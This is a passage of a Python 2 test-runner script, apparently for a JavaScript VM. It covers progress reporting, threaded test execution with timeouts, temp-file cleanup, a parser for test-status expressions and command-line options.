    if test.IsNegative():
      negative_marker = '[negative] '
    else:
      negative_marker = ''
    print "=== %(label)s %(negative)s===" % {
      'label': test.GetLabel(),
      'negative': negative_marker
    }
    print "Path: %s" % "/".join(test.path)

  def Run(self, tasks):
    """Run all queued cases on `tasks` threads.

    Returns True iff no test produced unexpected output.
    """
    self.Starting()
    threads = []
    # Spawn N-1 threads and then use this thread as the last one.
    # That way -j1 avoids threading altogether which is a nice fallback
    # in case of threading problems.
    for i in xrange(tasks - 1):
      thread = threading.Thread(target=self.RunSingle, args=[])
      threads.append(thread)
      thread.start()
    try:
      self.RunSingle()
      # Wait for the remaining threads
      for thread in threads:
        # Use a timeout so that signals (ctrl-c) will be processed.
        thread.join(timeout=10000000)
    except Exception, e:
      # If there's an exception we schedule an interruption for any
      # remaining threads.
      self.terminate = True
      # ...and then reraise the exception to bail out
      raise
    self.Done()
    return not self.failed

  def RunSingle(self):
    """Worker loop: pull cases off the queue until it is empty or a
    terminate has been requested, recording each outcome under the lock."""
    while not self.terminate:
      try:
        test = self.queue.get_nowait()
      except Empty:
        return
      case = test.case
      self.lock.acquire()
      self.AboutToRun(case)
      self.lock.release()
      try:
        start = time.time()
        output = case.Run()
        case.duration = (time.time() - start)
      except BreakNowException:
        self.terminate = True
      except IOError, e:
        # IOErrors are only expected while shutting down (temp files of
        # aborted runs); anything else is a real bug.
        assert self.terminate
        return
      if self.terminate:
        return
      self.lock.acquire()
      if output.UnexpectedOutput():
        self.failed.append(output)
        if output.HasCrashed():
          self.crashed += 1
      else:
        self.succeeded += 1
      self.remaining -= 1
      self.HasRun(output)
      self.lock.release()


def EscapeCommand(command):
  """Join a command list into one printable string, quoting parts that
  contain spaces."""
  parts = []
  for part in command:
    if ' ' in part:
      # Escape spaces. We may need to escape more characters for this
      # to work properly.
      parts.append('"%s"' % part)
    else:
      parts.append(part)
  return " ".join(parts)


class SimpleProgressIndicator(ProgressIndicator):
  """Line-oriented reporter: summary up front, full failure dump at the end."""

  def Starting(self):
    print 'Running %i tests' % len(self.cases)

  def Done(self):
    print
    for failed in self.failed:
      self.PrintFailureHeader(failed.test)
      if failed.output.stderr:
        print "--- stderr ---"
        print failed.output.stderr.strip()
      if failed.output.stdout:
        print "--- stdout ---"
        print failed.output.stdout.strip()
      print "Command: %s" % EscapeCommand(failed.command)
      if failed.HasCrashed():
        print "--- CRASHED ---"
      if failed.HasTimedOut():
        print "--- TIMEOUT ---"
    if len(self.failed) == 0:
      print "==="
      print "=== All tests succeeded"
      print "==="
    else:
      print
      print "==="
      print "=== %i tests failed" % len(self.failed)
      if self.crashed > 0:
        print "=== %i tests CRASHED" % self.crashed
      print "==="


class VerboseProgressIndicator(SimpleProgressIndicator):
  """Prints one 'Starting'/'Done' line per test."""

  def AboutToRun(self, case):
    print 'Starting %s...' % case.GetLabel()
    sys.stdout.flush()

  def HasRun(self, output):
    if output.UnexpectedOutput():
      if output.HasCrashed():
        outcome = 'CRASH'
      else:
        outcome = 'FAIL'
    else:
      outcome = 'pass'
    print 'Done running %s: %s' % (output.test.GetLabel(), outcome)


class DotsProgressIndicator(SimpleProgressIndicator):
  """Prints one character per test: '.', 'F', 'T' or 'C'."""

  def AboutToRun(self, case):
    pass

  def HasRun(self, output):
    total = self.succeeded + len(self.failed)
    # Wrap the dot line every 50 tests.
    if (total > 1) and (total % 50 == 1):
      sys.stdout.write('\n')
    if output.UnexpectedOutput():
      if output.HasCrashed():
        sys.stdout.write('C')
        sys.stdout.flush()
      elif output.HasTimedOut():
        sys.stdout.write('T')
        sys.stdout.flush()
      else:
        sys.stdout.write('F')
        sys.stdout.flush()
    else:
      sys.stdout.write('.')
      sys.stdout.flush()


class CompactProgressIndicator(ProgressIndicator):
  """Single self-overwriting status line; `templates` supplies the format
  strings (see Color/Monochrome subclasses)."""

  def __init__(self, cases, templates):
    super(CompactProgressIndicator, self).__init__(cases)
    self.templates = templates
    # Length of the last status line printed, so ClearLine can erase it.
    self.last_status_length = 0
    self.start_time = time.time()

  def Starting(self):
    pass

  def Done(self):
    self.PrintProgress('Done')

  def AboutToRun(self, case):
    self.PrintProgress(case.GetLabel())

  def HasRun(self, output):
    if output.UnexpectedOutput():
      self.ClearLine(self.last_status_length)
      self.PrintFailureHeader(output.test)
      stdout = output.output.stdout.strip()
      if len(stdout):
        print self.templates['stdout'] % stdout
      stderr = output.output.stderr.strip()
      if len(stderr):
        print self.templates['stderr'] % stderr
      print "Command: %s" % EscapeCommand(output.command)
      if output.HasCrashed():
        print "--- CRASHED ---"
      if output.HasTimedOut():
        print "--- TIMEOUT ---"

  def Truncate(self, str, length):
    # NOTE(review): parameter `str` shadows the builtin within this method.
    if length and (len(str) > (length - 3)):
      return str[:(length-3)] + "..."
    else:
      return str

  def PrintProgress(self, name):
    """Redraw the status line for the test currently named `name`."""
    self.ClearLine(self.last_status_length)
    elapsed = time.time() - self.start_time
    status = self.templates['status_line'] % {
      'passed': self.succeeded,
      # Percentage of tests already dispatched, not of tests passed.
      'remaining': (((self.total - self.remaining) * 100) // self.total),
      'failed': len(self.failed),
      'test': name,
      'mins': int(elapsed) / 60,
      'secs': int(elapsed) % 60
    }
    status = self.Truncate(status, 78)
    self.last_status_length = len(status)
    # Trailing comma: stay on the same line so the next redraw overwrites it.
    print status,
    sys.stdout.flush()


class ColorProgressIndicator(CompactProgressIndicator):
  """Compact indicator using ANSI color escape sequences."""

  def __init__(self, cases):
    templates = {
      'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
      'stdout': "\033[1m%s\033[0m",
      'stderr': "\033[31m%s\033[0m",
    }
    super(ColorProgressIndicator, self).__init__(cases, templates)

  def ClearLine(self, last_line_length):
    # ANSI "erase line" + carriage return.
    print "\033[1K\r",


class MonochromeProgressIndicator(CompactProgressIndicator):
  """Compact indicator without escape codes (plain terminals, logs)."""

  def __init__(self, cases):
    templates = {
      'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
      'stdout': '%s',
      'stderr': '%s',
      'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
      'max_length': 78
    }
    super(MonochromeProgressIndicator, self).__init__(cases, templates)

  def ClearLine(self, last_line_length):
    # Overwrite the old line with spaces and return to column 0.
    print ("\r" + (" " * last_line_length) + "\r"),


# Maps the -p/--progress option value to an indicator class.
PROGRESS_INDICATORS = {
  'verbose': VerboseProgressIndicator,
  'dots': DotsProgressIndicator,
  'color': ColorProgressIndicator,
  'mono': MonochromeProgressIndicator
}


# -------------------------
# --- F r a m e w o r k ---
# -------------------------


class BreakNowException(Exception):
  """Raised by TestCase.Run to abort the whole run (ctrl-c / IO failure)."""

  def __init__(self, value):
    self.value = value

  def __str__(self):
    return repr(self.value)


class CommandOutput(object):
  """Raw result of one executed command: exit code, timeout flag and
  captured stdout/stderr."""

  def __init__(self, exit_code, timed_out, stdout, stderr):
    self.exit_code = exit_code
    self.timed_out = timed_out
    self.stdout = stdout
    self.stderr = stderr
    # Lazily filled in by TestCase.DidFail (tri-state: None = not yet known).
    self.failed = None


class TestCase(object):
  """A single runnable test; suites subclass this (GetCommand etc. are
  provided by the subclasses, not visible here)."""

  def __init__(self, context,
               path, mode):
    self.path = path
    self.context = context
    self.duration = None
    self.mode = mode

  def IsNegative(self):
    # Negative tests are expected to fail; subclasses may override.
    return False

  def TestsIsolates(self):
    return False

  def CompareTime(self, other):
    # Sorts longest-running first.
    return cmp(other.duration, self.duration)

  def DidFail(self, output):
    """Return whether `output` is a failure, caching the verdict on it."""
    if output.failed is None:
      output.failed = self.IsFailureOutput(output)
    return output.failed

  def IsFailureOutput(self, output):
    return output.exit_code != 0

  def GetSource(self):
    return "(no source available)"

  def RunCommand(self, command):
    """Run `command` through the context's processor and wrap the result."""
    full_command = self.context.processor(command)
    output = Execute(full_command,
                     self.context,
                     self.context.GetTimeout(self, self.mode))
    self.Cleanup()
    return TestOutput(self,
                      full_command,
                      output,
                      self.context.store_unexpected_output)

  def BeforeRun(self):
    pass

  def AfterRun(self, result):
    pass

  def GetCustomFlags(self, mode):
    # None means "use the default FLAGS for this mode".
    return None

  def Run(self):
    self.BeforeRun()
    result = None
    try:
      result = self.RunCommand(self.GetCommand())
    except:
      # NOTE(review): this sets `terminate` on the TestCase, but the
      # shutdown flag the workers poll lives on the ProgressIndicator;
      # nothing visible here reads TestCase.terminate — looks like a bug,
      # though BreakNowException below still triggers the shutdown.
      self.terminate = True
      raise BreakNowException("User pressed CTRL+C or IO went wrong")
    finally:
      self.AfterRun(result)
    return result

  def Cleanup(self):
    return


class TestOutput(object):
  """Pairs a TestCase with the CommandOutput it produced and classifies
  the outcome (crash / timeout / fail / pass)."""

  def __init__(self, test, command, output, store_unexpected_output):
    self.test = test
    self.command = command
    self.output = output
    self.store_unexpected_output = store_unexpected_output

  def UnexpectedOutput(self):
    """True iff the observed outcome is not in the test's expected set."""
    if self.HasCrashed():
      outcome = CRASH
    elif self.HasTimedOut():
      outcome = TIMEOUT
    elif self.HasFailed():
      outcome = FAIL
    else:
      outcome = PASS
    return not outcome in self.test.outcomes

  def HasPreciousOutput(self):
    return self.UnexpectedOutput() and self.store_unexpected_output

  def HasCrashed(self):
    if utils.IsWindows():
      # Treat NTSTATUS-style failure codes (high bit set, and not one of
      # the 0x3FFFFF00-masked values) as crashes.
      return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
    else:
      # Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out: return False return self.output.exit_code < 0 and \ self.output.exit_code != -signal.SIGABRT def HasTimedOut(self): return self.output.timed_out def HasFailed(self): execution_failed = self.test.DidFail(self.output) if self.test.IsNegative(): return not execution_failed else: return execution_failed def KillProcessWithID(pid): if utils.IsWindows(): os.popen('taskkill /T /F /PID %d' % pid) else: os.kill(pid, signal.SIGTERM) MAX_SLEEP_TIME = 0.1 INITIAL_SLEEP_TIME = 0.0001 SLEEP_TIME_FACTOR = 1.25 SEM_INVALID_VALUE = -1 SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h def Win32SetErrorMode(mode): prev_error_mode = SEM_INVALID_VALUE try: import ctypes prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode) except ImportError: pass return prev_error_mode def RunProcess(context, timeout, args, **rest): if context.verbose: print "#", " ".join(args) popen_args = args prev_error_mode = SEM_INVALID_VALUE if utils.IsWindows(): popen_args = '"' + subprocess.list2cmdline(args) + '"' if context.suppress_dialogs: # Try to change the error mode to avoid dialogs on fatal errors. Don't # touch any existing error mode flags by merging the existing error mode. # See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx. error_mode = SEM_NOGPFAULTERRORBOX prev_error_mode = Win32SetErrorMode(error_mode) Win32SetErrorMode(error_mode | prev_error_mode) process = subprocess.Popen( shell = utils.IsWindows(), args = popen_args, **rest ) if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE: Win32SetErrorMode(prev_error_mode) # Compute the end time - if the process crosses this limit we # consider it timed out. if timeout is None: end_time = None else: end_time = time.time() + timeout timed_out = False # Repeatedly check the exit code from the process in a # loop and keep track of whether or not it times out. 
  exit_code = None
  sleep_time = INITIAL_SLEEP_TIME
  while exit_code is None:
    if (not end_time is None) and (time.time() >= end_time):
      # Kill the process and wait for it to exit.
      KillProcessWithID(process.pid)
      exit_code = process.wait()
      timed_out = True
    else:
      exit_code = process.poll()
      # Back off exponentially, capped at MAX_SLEEP_TIME, to keep the
      # polling cheap for long-running children.
      time.sleep(sleep_time)
      sleep_time = sleep_time * SLEEP_TIME_FACTOR
      if sleep_time > MAX_SLEEP_TIME:
        sleep_time = MAX_SLEEP_TIME
  return (process, exit_code, timed_out)


def PrintError(str):
  # NOTE(review): parameter `str` shadows the builtin within this function.
  sys.stderr.write(str)
  sys.stderr.write('\n')


def CheckedUnlink(name):
  """Unlink `name`, retrying with increasing delays; logs on final failure."""
  # On Windows, when run with -jN in parallel processes,
  # OS often fails to unlink the temp file. Not sure why.
  # Need to retry.
  # Idea from https://bugs.webkit.org/attachment.cgi?id=75982&action=prettypatch
  retry_count = 0
  while retry_count < 30:
    try:
      os.unlink(name)
      return
    except OSError, e:
      retry_count += 1
      time.sleep(retry_count * 0.1)
  PrintError("os.unlink() " + str(e))


def Execute(args, context, timeout=None):
  """Run `args` capturing stdout/stderr into temp files; returns a
  CommandOutput with the captured text."""
  (fd_out, outname) = tempfile.mkstemp()
  (fd_err, errname) = tempfile.mkstemp()
  (process, exit_code, timed_out) = RunProcess(
    context,
    timeout,
    args = args,
    stdout = fd_out,
    stderr = fd_err,
  )
  os.close(fd_out)
  os.close(fd_err)
  # NOTE(review): these file objects are never closed explicitly; they are
  # only reclaimed by refcounting, which can keep the temp files open long
  # enough to make the CheckedUnlink retries below necessary on Windows.
  output = file(outname).read()
  errors = file(errname).read()
  CheckedUnlink(outname)
  CheckedUnlink(errname)
  return CommandOutput(exit_code, timed_out, output, errors)


def ExecuteNoCapture(args, context, timeout=None):
  """Run `args` with inherited stdout/stderr (used for builds)."""
  (process, exit_code, timed_out) = RunProcess(
    context,
    timeout,
    args = args,
  )
  return CommandOutput(exit_code, False, "", "")


def CarCdr(path):
  """Split a path list into (head, tail); head is None for an empty list."""
  if len(path) == 0:
    return (None, [ ])
  else:
    return (path[0], path[1:])


# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[],
                 ['--stress-opt', '--always-opt'],
                 ['--nocrankshaft']]


class TestConfiguration(object):
  """Base class for per-suite testcfg.py configurations."""

  def __init__(self, context, root):
    self.context = context
    self.root = root

  def Contains(self, path, file):
    """True iff every Pattern in `path` matches the corresponding
    component of `file` (a prefix match on components)."""
    if len(path) > len(file):
      return False
    for i in xrange(len(path)):
      if not path[i].match(file[i]):
        return False
    return True

  def GetTestStatus(self, sections, defs):
    pass

  def VariantFlags(self):
    return VARIANT_FLAGS


class TestSuite(object):
  """Minimal named node in the test suite tree."""

  def __init__(self, name):
    self.name = name

  def GetName(self):
    return self.name


class TestRepository(TestSuite):
  """A suite backed by a directory containing a testcfg.py module."""

  def __init__(self, path):
    normalized_path = abspath(path)
    super(TestRepository, self).__init__(basename(normalized_path))
    self.path = normalized_path
    self.is_loaded = False
    self.config = None

  def GetConfiguration(self, context):
    """Load (once) and return the suite's testcfg.GetConfiguration()."""
    if self.is_loaded:
      return self.config
    self.is_loaded = True
    file = None
    try:
      # NOTE(review): local `file` shadows the builtin for this method.
      (file, pathname, description) = imp.find_module('testcfg', [ self.path ])
      module = imp.load_module('testcfg', file, pathname, description)
      self.config = module.GetConfiguration(context, self.path)
    finally:
      if file:
        file.close()
    return self.config

  def GetBuildRequirements(self, path, context):
    return self.GetConfiguration(context).GetBuildRequirements()

  def DownloadData(self, context):
    # DownloadData is optional on configurations; only call when present.
    config = self.GetConfiguration(context)
    if 'DownloadData' in dir(config):
      config.DownloadData()

  def AddTestsToList(self, result, current_path, path, context, mode):
    """Append this suite's tests (once per variant flag set) to `result`."""
    config = self.GetConfiguration(context)
    for v in config.VariantFlags():
      tests = config.ListTests(current_path, path, mode, v)
      for t in tests:
        t.variant_flags = v
      result += tests

  def GetTestStatus(self, context, sections, defs):
    self.GetConfiguration(context).GetTestStatus(sections, defs)


class LiteralTestSuite(TestSuite):
  """The root suite: a fixed list of child suites, filtered by the first
  component of the requested path."""

  def __init__(self, tests):
    super(LiteralTestSuite, self).__init__('root')
    self.tests = tests

  def GetBuildRequirements(self, path, context):
    (name, rest) = CarCdr(path)
    result = [ ]
    for test in self.tests:
      if not name or name.match(test.GetName()):
        result += test.GetBuildRequirements(rest, context)
    return result

  def DownloadData(self, path, context):
    (name, rest) = CarCdr(path)
    for test in self.tests:
      if not name or name.match(test.GetName()):
        test.DownloadData(context)

  def ListTests(self, current_path, path,
                context, mode, variant_flags):
    (name, rest) = CarCdr(path)
    result = [ ]
    for test in self.tests:
      test_name = test.GetName()
      if not name or name.match(test_name):
        full_path = current_path + [test_name]
        test.AddTestsToList(result, full_path, path, context, mode)
    return result

  def GetTestStatus(self, context, sections, defs):
    for test in self.tests:
      test.GetTestStatus(context, sections, defs)


# Per-mode executable suffix, default VM flags and timeout multiplier.
SUFFIX = {
    'debug'   : '_g',
    'release' : '' }
FLAGS = {
    'debug'   : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
    'release' : []}
TIMEOUT_SCALEFACTOR = {
    'debug'   : 4,
    'release' : 1 }


class Context(object):
  """Immutable bag of run-wide settings (paths, timeout, flags processor)
  handed to every test case."""

  def __init__(self, workspace, buildspace, verbose, vm, timeout, processor,
               suppress_dialogs, store_unexpected_output):
    self.workspace = workspace
    self.buildspace = buildspace
    self.verbose = verbose
    self.vm_root = vm
    self.timeout = timeout
    # Callable that rewrites a command list (see GetSpecialCommandProcessor).
    self.processor = processor
    self.suppress_dialogs = suppress_dialogs
    self.store_unexpected_output = store_unexpected_output

  def GetVm(self, mode):
    """Path to the VM binary for `mode` ('debug' adds the '_g' suffix)."""
    name = self.vm_root + SUFFIX[mode]
    if utils.IsWindows() and not name.endswith('.exe'):
      name = name + '.exe'
    return name

  def GetVmCommand(self, testcase, mode):
    return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)

  def GetVmFlags(self, testcase, mode):
    # Custom per-test flags replace the mode defaults; variant flags are
    # always prepended.
    flags = testcase.GetCustomFlags(mode)
    if flags is None:
      flags = FLAGS[mode]
    return testcase.variant_flags + flags

  def GetTimeout(self, testcase, mode):
    # Stress-opt runs each test several times, hence the extra factor.
    result = self.timeout * TIMEOUT_SCALEFACTOR[mode]
    if '--stress-opt' in self.GetVmFlags(testcase, mode):
      return result * 4
    else:
      return result


def RunTestCases(cases_to_run, progress, tasks):
  """Instantiate the chosen progress indicator and run all cases on
  `tasks` threads; returns the indicator's success flag (0 on error)."""
  progress = PROGRESS_INDICATORS[progress](cases_to_run)
  result = 0
  try:
    result = progress.Run(tasks)
  except Exception, e:
    print "\n", e
  return result


def BuildRequirements(context, requirements, mode, scons_flags):
  """Build the required targets with scons; True iff the build succeeded."""
  command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
                  + requirements
                  + scons_flags)
  output = ExecuteNoCapture(command_line, context)
  return output.exit_code == 0


# -------------------------------------------
# --- T e s t   C o n f i g u r a t i o n ---
# -------------------------------------------


# Outcome identifiers used in test expectation (.status) files.
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'


class Expression(object):
  """Base class for parsed status-file expressions."""
  pass


class Constant(Expression):

  def __init__(self, value):
    self.value = value

  def Evaluate(self, env, defs):
    return self.value


class Variable(Expression):
  """A '$name' reference resolved against the environment dict."""

  def __init__(self, name):
    self.name = name

  def GetOutcomes(self, env, defs):
    if self.name in env: return ListSet([env[self.name]])
    else: return Nothing()

  def Evaluate(self, env, defs):
    return env[self.name]


class Outcome(Expression):
  """A bare word: either a definition reference (defs) or a literal
  outcome name."""

  def __init__(self, name):
    self.name = name

  def GetOutcomes(self, env, defs):
    if self.name in defs:
      return defs[self.name].GetOutcomes(env, defs)
    else:
      return ListSet([self.name])


class Set(object):
  """Abstract set-of-outcomes with Intersect/Union/IsEmpty."""
  pass


class ListSet(Set):
  """Finite set backed by a plain list."""

  def __init__(self, elms):
    self.elms = elms

  def __str__(self):
    return "ListSet%s" % str(self.elms)

  def Intersect(self, that):
    # Delegate to the lattice elements (Everything/Nothing) when mixed.
    if not isinstance(that, ListSet):
      return that.Intersect(self)
    return ListSet([ x for x in self.elms if x in that.elms ])

  def Union(self, that):
    if not isinstance(that, ListSet):
      return that.Union(self)
    return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])

  def IsEmpty(self):
    return len(self.elms) == 0


class Everything(Set):
  """The universal set (identity for Intersect, absorbing for Union)."""

  def Intersect(self, that):
    return that

  def Union(self, that):
    return self

  def IsEmpty(self):
    return False


class Nothing(Set):
  """The empty set (absorbing for Intersect, identity for Union)."""

  def Intersect(self, that):
    return self

  def Union(self, that):
    return that

  def IsEmpty(self):
    return True


class Operation(Expression):
  """Binary node: '||'/',' (or), '&&' (and), '=='/'!=' (set compare) or
  'if' (conditional outcome)."""

  def __init__(self, left, op, right):
    self.left = left
    self.op = op
    self.right = right

  def Evaluate(self, env, defs):
    if self.op == '||' or self.op == ',':
      return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
    elif self.op == 'if':
      # A bare 'if' expression is never true as a section condition.
      return False
    elif self.op == '==':
      # Equality means the outcome sets overlap, not literal equality.
      inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
      return not inter.IsEmpty()
    elif self.op == '!=':
      inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
      return inter.IsEmpty()
    else:
      assert self.op == '&&'
      return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)

  def GetOutcomes(self, env, defs):
    if self.op == '||' or self.op == ',':
      return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
    elif self.op == 'if':
      # 'left if right': left's outcomes only when the condition holds.
      if self.right.Evaluate(env, defs):
        return self.left.GetOutcomes(env, defs)
      else:
        return Nothing()
    else:
      assert self.op == '&&'
      return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))


def IsAlpha(str):
  """True iff every character is alphanumeric or '_' (word token)."""
  for char in str:
    if not (char.isalpha() or char.isdigit() or char == '_'):
      return False
  return True


class Tokenizer(object):
  """A simple string tokenizer that chops expressions into variables,
  parens and operators"""

  def __init__(self, expr):
    self.index = 0
    self.expr = expr
    self.length = len(expr)
    self.tokens = None

  def Current(self, length = 1):
    """The next `length` characters, or "" when not enough remain."""
    if not self.HasMore(length): return ""
    return self.expr[self.index:self.index+length]

  def HasMore(self, length = 1):
    # NOTE(review): for length > 1 this looks off by one (index < length+1
    # at the end of the string); Current() still returns a short slice
    # that fails the two-character comparisons, so it appears harmless —
    # confirm before changing.
    return self.index < self.length + (length - 1)

  def Advance(self, count = 1):
    self.index = self.index + count

  def AddToken(self, token):
    self.tokens.append(token)

  def SkipSpaces(self):
    while self.HasMore() and self.Current().isspace():
      self.Advance()

  def Tokenize(self):
    """Return the token list, or None on a malformed expression."""
    self.tokens = [ ]
    while self.HasMore():
      self.SkipSpaces()
      if not self.HasMore():
        return None
      if self.Current() == '(':
        self.AddToken('(')
        self.Advance()
      elif self.Current() == ')':
        self.AddToken(')')
        self.Advance()
      elif self.Current() == '$':
        self.AddToken('$')
        self.Advance()
      elif self.Current() == ',':
        self.AddToken(',')
        self.Advance()
      elif IsAlpha(self.Current()):
        # Accumulate a whole word token.
        buf = ""
        while self.HasMore() and IsAlpha(self.Current()):
          buf += self.Current()
          self.Advance()
        self.AddToken(buf)
      elif self.Current(2) == '&&':
        self.AddToken('&&')
        self.Advance(2)
      elif self.Current(2) == '||':
        self.AddToken('||')
self.Advance(2) elif self.Current(2) == '==': self.AddToken('==') self.Advance(2) elif self.Current(2) == '!=': self.AddToken('!=') self.Advance(2) else: return None return self.tokens class Scanner(object): """A simple scanner that can serve out tokens from a given list""" def __init__(self, tokens): self.tokens = tokens self.length = len(tokens) self.index = 0 def HasMore(self): return self.index < self.length def Current(self): return self.tokens[self.index] def Advance(self): self.index = self.index + 1 def ParseAtomicExpression(scan): if scan.Current() == "true": scan.Advance() return Constant(True) elif scan.Current() == "false": scan.Advance() return Constant(False) elif IsAlpha(scan.Current()): name = scan.Current() scan.Advance() return Outcome(name.lower()) elif scan.Current() == '$': scan.Advance() if not IsAlpha(scan.Current()): return None name = scan.Current() scan.Advance() return Variable(name.lower()) elif scan.Current() == '(': scan.Advance() result = ParseLogicalExpression(scan) if (not result) or (scan.Current() != ')'): return None scan.Advance() return result else: return None BINARIES = ['==', '!='] def ParseOperatorExpression(scan): left = ParseAtomicExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in BINARIES): op = scan.Current() scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, op, right) return left def ParseConditionalExpression(scan): left = ParseOperatorExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() == 'if'): scan.Advance() right = ParseOperatorExpression(scan) if not right: return None left = Operation(left, 'if', right) return left LOGICALS = ["&&", "||", ","] def ParseLogicalExpression(scan): left = ParseConditionalExpression(scan) if not left: return None while scan.HasMore() and (scan.Current() in LOGICALS): op = scan.Current() scan.Advance() right = ParseConditionalExpression(scan) if not right: return None 
left = Operation(left, op, right) return left def ParseCondition(expr): """Parses a logical expression into an Expression object""" tokens = Tokenizer(expr).Tokenize() if not tokens: print "Malformed expression: '%s'" % expr return None scan = Scanner(tokens) ast = ParseLogicalExpression(scan) if not ast: print "Malformed expression: '%s'" % expr return None if scan.HasMore(): print "Malformed expression: '%s'" % expr return None return ast class ClassifiedTest(object): def __init__(self, case, outcomes): self.case = case self.outcomes = outcomes def TestsIsolates(self): return self.case.TestsIsolates() class Configuration(object): """The parsed contents of a configuration file""" def __init__(self, sections, defs): self.sections = sections self.defs = defs def ClassifyTests(self, cases, env): sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)] all_rules = reduce(list.__add__, [s.rules for s in sections], []) unused_rules = set(all_rules) result = [ ] all_outcomes = set([]) for case in cases: matches = [ r for r in all_rules if r.Contains(case.path) ] outcomes = set([]) for rule in matches: outcomes = outcomes.union(rule.GetOutcomes(env, self.defs)) unused_rules.discard(rule) if not outcomes: outcomes = [PASS] case.outcomes = outcomes all_outcomes = all_outcomes.union(outcomes) result.append(ClassifiedTest(case, outcomes)) return (result, list(unused_rules), all_outcomes) class Section(object): """A section of the configuration file. 
  Sections are enabled or disabled prior to running the tests,
  based on their conditions"""

  def __init__(self, condition):
    self.condition = condition
    self.rules = [ ]

  def AddRule(self, rule):
    self.rules.append(rule)


class Rule(object):
  """A single rule that specifies the expected outcome for a single
  test."""

  def __init__(self, raw_path, path, value):
    self.raw_path = raw_path
    self.path = path
    self.value = value

  def GetOutcomes(self, env, defs):
    # NOTE(review): local `set` shadows the builtin within this method.
    set = self.value.GetOutcomes(env, defs)
    assert isinstance(set, ListSet)
    return set.elms

  def Contains(self, path):
    """True iff this rule's pattern list prefix-matches `path`."""
    if len(self.path) > len(path):
      return False
    for i in xrange(len(self.path)):
      if not self.path[i].match(path[i]):
        return False
    return True


# Status-file line shapes: [condition] section headers, 'path: outcomes'
# rules, 'def name=expr' definitions and 'prefix path' directives.
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')


def ReadConfigurationInto(path, sections, defs):
  """Parse the status file at `path` into `sections` and `defs` in place.

  Returns True on success, False on the first malformed line.
  """
  # Rules before any [condition] header land in an always-true section.
  current_section = Section(Constant(True))
  sections.append(current_section)
  prefix = []
  for line in utils.ReadLinesFrom(path):
    header_match = HEADER_PATTERN.match(line)
    if header_match:
      condition_str = header_match.group(1).strip()
      condition = ParseCondition(condition_str)
      new_section = Section(condition)
      sections.append(new_section)
      current_section = new_section
      continue
    rule_match = RULE_PATTERN.match(line)
    if rule_match:
      path = prefix + SplitPath(rule_match.group(1).strip())
      value_str = rule_match.group(2).strip()
      value = ParseCondition(value_str)
      if not value:
        return False
      current_section.AddRule(Rule(rule_match.group(1), path, value))
      continue
    def_match = DEF_PATTERN.match(line)
    if def_match:
      name = def_match.group(1).lower()
      value = ParseCondition(def_match.group(2).strip())
      if not value:
        return False
      defs[name] = value
      continue
    prefix_match = PREFIX_PATTERN.match(line)
    if prefix_match:
      # Subsequent rule paths are resolved relative to this prefix.
      prefix = SplitPath(prefix_match.group(1).strip())
      continue
    print "Malformed line: '%s'." % line
    return False
  return True


# ---------------
# --- M a i n ---
# ---------------


ARCH_GUESS = utils.GuessArchitecture()
TIMEOUT_DEFAULT = 60;


def BuildOptions():
  """Build and return the optparse parser for the command line."""
  result = optparse.OptionParser()
  result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
      default='release')
  result.add_option("-v", "--verbose", help="Verbose output",
      default=False, action="store_true")
  result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
      default=[], action="append")
  result.add_option("-p", "--progress",
      help="The style of progress indicator (verbose, dots, color, mono)",
      choices=PROGRESS_INDICATORS.keys(), default="mono")
  result.add_option("--no-build", help="Don't build requirements",
      default=False, action="store_true")
  result.add_option("--build-only", help="Only build requirements, don't run the tests",
      default=False, action="store_true")
  result.add_option("--build-system", help="Build system in use (scons or gyp)",
      default='scons')
  result.add_option("--report", help="Print a summary of the tests to be run",
      default=False, action="store_true")
  result.add_option("--download-data", help="Download missing test suite data",
      default=False, action="store_true")
  result.add_option("-s", "--suite", help="A test suite",
      default=[], action="append")
  result.add_option("-t", "--timeout", help="Timeout in seconds",
      default=-1, type="int")
  result.add_option("--arch", help='The architecture to run tests for',
      default='none')
  result.add_option("--snapshot", help="Run the tests with snapshot turned on",
      default=False, action="store_true")
  result.add_option("--simulator", help="Run tests with architecture simulator",
      default='none')
  result.add_option("--special-command", default=None)
  result.add_option("--valgrind", help="Run tests through valgrind",
      default=False, action="store_true")
  result.add_option("--cat", help="Print the source of the tests",
      default=False, action="store_true")
  result.add_option("--warn-unused", help="Report unused rules",
